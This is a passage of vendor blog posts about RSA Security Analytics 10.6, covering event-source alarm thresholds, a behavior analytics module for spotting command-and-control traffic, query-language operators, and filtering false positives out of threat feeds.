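As a sketch of the arithmetic behind that alarm: the deviation is a z-score of the observed hourly count against the learned baseline. The mean comes from the example above; the standard deviation below is a hypothetical value chosen to reproduce the 2.657 figure (SA's actual learned value is not shown in the post):

```python
# Z-score of an observed hourly event count against a learned baseline.
mean = 333       # normal event count for the 6:00-7:00 PM hour (from the example)
stddev = 125.33  # hypothetical learned standard deviation, not from the product
observed = 0     # events actually received this hour

z = (observed - mean) / stddev
print(round(z, 3))  # -2.657, i.e. 2.657 standard deviations below normal
```

Raising the Low/High thresholds in the settings simply requires a larger |z| before an alarm fires.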



You can enable email, syslog, or SNMP notifications once you determine the alarms aren't giving you false positives.  You can also tweak the Low and High standard deviation settings to better tune it to your environment.  Raising the standard deviations will make it less likely for an alarm to be generated.



Let us know what you think and how it works for you!


More information can be found on RSA Security Analytics Documentation under Security Analytics 10.6 > Event Source Management > Procedures > Configure Automatic Alerting

What if you could find hosts in your network that are actively communicating with previously unknown malicious domains? Using the new behavior analytics module introduced in Security Analytics (SA) 10.6 you can. This new threat detection module is actually the first of many behavior analytics modules RSA will be delivering within SA. This new capability powerfully leverages the industry leading network, log and endpoint data collection SA is known for. Our goal is to dramatically expand the value SA delivers by automating common hunting activities and detecting threats that would be very difficult and time consuming to find manually.


With this release RSA has developed a brand new threat detection analytics solution hosted within the Event Stream Analysis (ESA) component. This new capability consumes network metadata and identifies behaviors indicative of command and control communications. This new detection service delivers prioritized alerts for analysts to investigate so they may find infected hosts much more quickly.


Customers that have SA network packet capture and the ESA component deployed can upgrade to 10.6 and follow a short list of steps to enable this new detection module. Once enabled, the module will automatically “warm up” for 24 hours and then start generating prioritized alerts. These alerts are enriched with context, including domain registration information and details of the behaviors that were determined to be suspect. As analysts triage and investigate alerts, the solution uses their feedback to further train the detection module, improving future accuracy.


We encourage you to upgrade to SA 10.6 and start utilizing this new capability to help defend your organization. If you are interested in seeing a short video of this feature in action click here.


Documentation on this capability may be found here.

It is a surprise to me how many people do not know all the operators available to them in the query language for investigations, so it made sense to run through some of the lesser-known ones here.


To start, there is the group NOT statement, which effectively does the same thing as the ! when negating an entire statement. For example, you can easily execute the query username != 'monkey', but !(username='monkey') does not work. Instead, the proper syntax is ~(username='monkey') or, alternatively, NOT(username='monkey'). This works for all functions, such as NOT(username contains 'monkey') or ~(username ends 'monkey').


Another useful operator is <=, which along with >= can be used on numerical values. For example, to find all sessions with a TCP destination port less than or equal to 1024, you can execute: tcp.dstport <= '1024'


These operators can be utilized in a report's where clause as well as in investigation queries.
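As a sketch, both operator families can appear in a single where clause (the values are only illustrative):

```
~(username = 'monkey') && tcp.dstport <= '1024'
```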


Further details on these as well as other syntax specifics can be found in the online Security Analytics documentation:

Queries - RSA Security Analytics Documentation


How to Filter Feeds

Posted by William Hart Employee Mar 31, 2016

Do you have a feed that is valuable but occasionally causes some false positives? Then this post is for you! The capability exists to filter out specific values from feeds without modifying the original data set. Why would you want such a thing? In some cases the feed is generated by RSA, or by another entity in your organization, which limits your ability to manipulate it before it is ingested by the Security Analytics decoders. In general, the intelligence makes the feed worth keeping, but there are some values that you wish could be ignored.


How do we achieve this? Simple, follow the steps below:


1) Determine the feed that is generating the errant value(s).


In a Security Analytics investigation, focus on the threat source meta key to determine which feed(s) generated the alert or meta for the IP, domain, or other value you want to whitelist or filter out.



In the example above (taken from old sample data), the domain was listed as suspicious by the various threat sources highlighted. If it were decided that this determination was incorrect, a filter file containing the hostname alias could be added for each feed listed in the threat source.


2) Create a filter file and add the errant value(s) to it.


To pick one as an example, suppose the malwaredomainlist-domain.feed is generating meta indicating that the domain is malicious. In a filter file named malwaredomainlist-domain.filter, add the domain on a single line. If additional values generated by this feed are incorrect, you can add those domains as subsequent rows in the same file.
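As a sketch, the filter file is simply one value per line. The snippet below builds such a file locally (the domains are hypothetical false positives, not real feed content) and notes how it might then be copied to the decoder in step 3:

```python
# Build the filter file: one errant value per line. The filename must match
# the feed name (malwaredomainlist-domain.feed -> malwaredomainlist-domain.filter).
# The domains below are hypothetical examples of values to whitelist.
domains = ["goodsite.example.com", "another-goodsite.example.com"]

with open("malwaredomainlist-domain.filter", "w") as f:
    f.write("\n".join(domains) + "\n")

# Then deploy it next to the feed on the decoder (step 3), e.g.:
#   scp malwaredomainlist-domain.filter root@<decoder>:/etc/netwitness/ng/feeds/
print(open("malwaredomainlist-domain.filter").read())
```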


3) Deploy the filter file to the same directory on the decoder(s) where the feed has been applied.


To get the filter file in the appropriate location on the decoder (e.g. /etc/netwitness/ng/feeds) either secure copy the file to the system or use the feed upload option on the feed tab located on the decoder configuration page.



Unfortunately, that page does not allow you to view the filter files once they have been uploaded. You can, however, view the feed filter in the Files tab on the decoder configuration page.





4) Disable and re-enable the feed so the decoder recognizes that the filter file exists.


5) That is it. Enjoy!


Please let me know if there are any additional questions or improvement suggestions in this area.
